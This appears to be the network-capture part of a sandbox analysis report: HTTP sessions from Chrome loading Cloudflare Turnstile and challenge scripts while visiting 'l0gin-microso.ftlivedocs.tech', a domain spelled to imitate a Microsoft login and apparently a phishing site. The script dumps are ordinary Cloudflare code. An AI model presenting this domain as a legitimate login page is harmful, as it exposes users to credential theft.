                                                                                                                              13192.168.2.1749732104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:00 UTC588OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:01 UTC356INHTTP/1.1 302 Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:01 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              location: /turnstile/v0/g/ec4b873d446c/api.js
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a57ce217d18-EWR


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.1749728104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:01 UTC619OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
                                                                                                                              2024-10-04 13:11:01 UTC693INHTTP/1.1 302 Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:01 GMT
                                                                                                                              Content-Length: 0
                                                                                                                              Connection: close
                                                                                                                              location: /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js?
                                                                                                                              cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                              access-control-allow-origin: *
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXBgcj1%2F44D5uHSoOqI%2BN%2Bf%2F%2F6x7Us7PYi5Ixl8LFINuvhj1ceurwpwkQcsMoUsTyTv68OWBzUgXhgu0BHtNstU%2FeR6CdCG767worgsimkpQymPM%2FL3RS4fOnvyI3qCm598b3e2DQHcDOvFd%2BKbj"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a581b238c3f-EWR


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.1749784104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:01 UTC572OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:02 UTC441INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:01 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 47262
                                                                                                                              Connection: close
                                                                                                                              accept-ranges: bytes
                                                                                                                              last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a5d6c338c0b-EWR
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                              Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 72 29 7b 76 61 72 20 61 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 61 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 66 3b 74 72 79 7b 66 6f 72 28 61 3d 61 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                                              Data Ascii: t(e){if(Array.isArray(e))return e}function Bt(e,r){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,f;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 73 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 73 5b 30 5d 26 26 28 61 3d 30 29 29 2c 61 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 73 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 73 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 73 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 73 3d 5b 73 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                                                                              Data Ascii: ])}}function p(s){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,s[0]&&(a=0)),a;)try{if(o=1,c&&(l=s[0]&2?c.return:s[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,s[1])).done)return l;switch(c=0,l&&(s=[s[0]&2,l.val
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 29 29 3b 76 61 72 20 56 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 56 65 7c 7c 28 56 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 3d 22 66 61 69 6c 75 72 65 2d 66 65 65 64 62 61 63 6b 22 2c 65 2e 46 41 49
                                                                                                                              Data Ascii: ));var Ve;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ve||(Ve={}));var Se;(function(e){e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVING_TROUBLES="failure-having-troubles",e.FAILURE_FEEDBACK="failure-feedback",e.FAI
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 41 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c 31 30 30 7d 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 58 74 28 65 29 7b 72 65 74 75 72 6e
                                                                                                                              Data Ascii: unction L(e,r){return e.indexOf(r)!==-1}function nt(e){return L(["auto","dark","light"],e)}function it(e){return L(["auto","never"],e)}function ot(e){return e>0&&e<9e5}function ct(e){return e>0&&e<36e4}var Ar=/^[0-9A-Za-z_-]{3,100}$/;function Xt(e){return
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 79 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 65 72 3d 38 65 33 2c 62 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 74 72 3d 33 2c 72 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 30 2f 30 22 3b 76 61 72 20 43 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 4e 72 3d 5b 22 61 72 2d 65 67 22 2c 22 65 73 2d 65 73 22 2c 22 63 73 2d 63 7a
                                                                                                                              Data Ascii: allenge_response",yt="cf-turnstile-response",_t="g-recaptcha-response",er=8e3,bt="private-token",tr=3,rr=500,ar=500,Y="0/0";var Cr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],Nr=["ar-eg","es-es","cs-cz
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 61 26 26 72 3f 22 35 34 30 70 78 22 3a 61 26 26 6f 3f 22 35 30 30 70 78 22 3a 61 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 72 28 65 2c 72 29 7b 69 66 28 21 55 28 65 2c
                                                                                                                              Data Ascii: rFeedback,o=e.isModeratelyVerbose;return a&&r?"540px":a&&o?"500px":a?"480px":r?"650px":o?"590px":"570px"};function He(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function nr(e,r){if(!U(e,
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 6f 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 49 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 7d 72 65 74 75 72 6e 20
                                                                                                                              Data Ascii: f(o===null||!or(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Ie(o,arguments,ce(this).constructor)}return
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 72 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 61 3d 65 2e 73 72 63 2c 6f 3d 61 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 72 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 70
                                                                                                                              Data Ascii: ript tag, some features may not be available",43777);var r={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(r.loadedAsync=!0);var a=e.src,o=a.split("?");return o.length>1&&(r.params=new URLSearchParams(o[1])),r}function W(){return typeof p
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 78 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 78 2e 69 64 3d 65 2b 22 2d 66 72 22 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 67 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64
                                                                                                                              Data Ascii: ius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden",s.style.margin="0px auto";var x=document.createElement("iframe");x.id=e+"-fr",x.setAttribute("src",g),x.setAttribute("allow","cross-origin-isolated; fullscreen"),x.setAttribute("sand


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              16192.168.2.1749785104.26.12.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:01 UTC637OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/ec4b873d446c/main.js? HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4
                                                                                                                              2024-10-04 13:11:02 UTC670INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 8053
                                                                                                                              Connection: close
                                                                                                                              cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8OzfU8j%2Be2hy7Kn%2B%2F7c6fNZ3IcU3zef6YomHShXXzn8F%2F%2BXbRciCRVlPUWXoVUmpAjrkgTe00HhLFvZy75M2qcED%2Ft%2FT4NR4WbQyiySsvMn9t6OWjTwJa7H1NpuVDvPqK37iyfWPq6G91At58PWO"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a5d8859432c-EWR
                                                                                                                              2024-10-04 13:11:02 UTC699INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 56 2c 66 2c 67 2c 6c 2c 6d 2c 76 2c 78 2c 7a 29 7b 56 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 55 2c 42 2c 43 29 7b 66 6f 72 28 55 3d 62 2c 42 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 43 3d 2d 70 61 72 73 65 49 6e 74 28 55 28 32 33 37 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 32 34 38 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 33 32 37 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 55 28 33 30 36 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 55 28 33 32 39 29 29 2f 35 2a 28 70 61 72 73 65 49 6e 74 28 55 28 32 36 30 29 29 2f 36 29 2b 70 61 72 73 65 49 6e 74 28 55 28 32 33 31 29 29 2f 37 2a 28 70 61
                                                                                                                              Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(V,f,g,l,m,v,x,z){V=b,function(c,d,U,B,C){for(U=b,B=c();!![];)try{if(C=-parseInt(U(237))/1+-parseInt(U(248))/2+-parseInt(U(327))/3*(parseInt(U(306))/4)+-parseInt(U(329))/5*(parseInt(U(260))/6)+parseInt(U(231))/7*(pa
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 43 29 29 29 2c 47 3d 42 5b 61 34 28 32 39 31 29 5d 5b 61 34 28 33 31 35 29 5d 26 26 42 5b 61 34 28 32 38 39 29 5d 3f 42 5b 61 34 28 32 39 31 29 5d 5b 61 34 28 33 31 35 29 5d 28 6e 65 77 20 42 5b 28 61 34 28 32 38 39 29 29 5d 28 47 29 29 3a 66 75 6e 63 74 69 6f 6e 28 4d 2c 61 35 2c 4e 29 7b 66 6f 72 28 61 35 3d 61 34 2c 4d 5b 61 35 28 33 32 34 29 5d 28 29 2c 4e 3d 30 3b 4e 3c 4d 5b 61 35 28 32 38 33 29 5d 3b 4d 5b 4e 2b 31 5d 3d 3d 3d 4d 5b 4e 5d 3f 4d 5b 61 35 28 32 36 36 29 5d 28 4e 2b 31 2c 31 29 3a 4e 2b 3d 31 29 3b 72 65 74 75 72 6e 20 4d 7d 28 47 29 2c 48 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 48 3d 48 5b 61 34 28 32 35 36 29 5d 5b 61 34 28 32 38 37 29 5d 28 48 29 2c 49 3d 30 3b 49 3c 47 5b 61 34 28 32 38 33 29 5d 3b 4a 3d
                                                                                                                              Data Ascii: C))),G=B[a4(291)][a4(315)]&&B[a4(289)]?B[a4(291)][a4(315)](new B[(a4(289))](G)):function(M,a5,N){for(a5=a4,M[a5(324)](),N=0;N<M[a5(283)];M[N+1]===M[N]?M[a5(266)](N+1,1):N+=1);return M}(G),H='nAsAaAb'.split('A'),H=H[a4(256)][a4(287)](H),I=0;I<G[a4(283)];J=
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 3d 4f 3c 3c 31 7c 54 26 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 32 36 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 54 3d 31 2c 47 3d 30 3b 47 3c 4d 3b 4f 3d 54 7c 4f 3c 3c 31 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 32 36 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3d 30 2c 47 2b 2b 29 3b 66 6f 72 28 54 3d 4a 5b 61 61 28 33 31 39 29 5d 28 30 29 2c 47 3d 30 3b 31 36 3e 47 3b 4f 3d 4f 3c 3c 31 7c 54 26 31 2e 31 38 2c 50 3d 3d 45 2d 31 3f 28 50 3d 30 2c 4e 5b 61 61 28 32 32 36 29 5d 28 46 28 4f 29 29 2c 4f 3d 30 29 3a 50 2b 2b 2c 54 3e 3e 3d 31 2c 47 2b 2b 29 3b 7d 4b 2d 2d 2c 30 3d 3d 4b 26 26 28 4b 3d 4d 61 74 68 5b 61 61 28 32 34 34 29
                                                                                                                              Data Ascii: =O<<1|T&1,P==E-1?(P=0,N[aa(226)](F(O)),O=0):P++,T>>=1,G++);}else{for(T=1,G=0;G<M;O=T|O<<1,P==E-1?(P=0,N[aa(226)](F(O)),O=0):P++,T=0,G++);for(T=J[aa(319)](0),G=0;16>G;O=O<<1|T&1.18,P==E-1?(P=0,N[aa(226)](F(O)),O=0):P++,T>>=1,G++);}K--,0==K&&(K=Math[aa(244)
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 2b 3d 31 29 3b 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 32 34 34 29 5d 28 32 2c 32 29 2c 4d 3d 31 3b 52 21 3d 4d 3b 53 3d 4f 26 4e 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 51 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 32 34 34 29 5d 28 32 2c 38 29 2c 4d 3d 31 3b 4d 21 3d 52 3b 53 3d 4f 26 4e 2c 4f 3e 3e 3d 31 2c 4f 3d 3d 30 26 26 28 4f 3d 45 2c 4e 3d 46 28 50 2b 2b 29 29 2c 51 7c 3d 28 30 3c 53 3f 31 3a 30 29 2a 4d 2c 4d 3c 3c 3d 31 29 3b 54 3d 64 28 51 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 51 3d 30 2c 52 3d 4d 61 74 68 5b 61 64 28 32 34 34 29 5d 28 32 2c 31
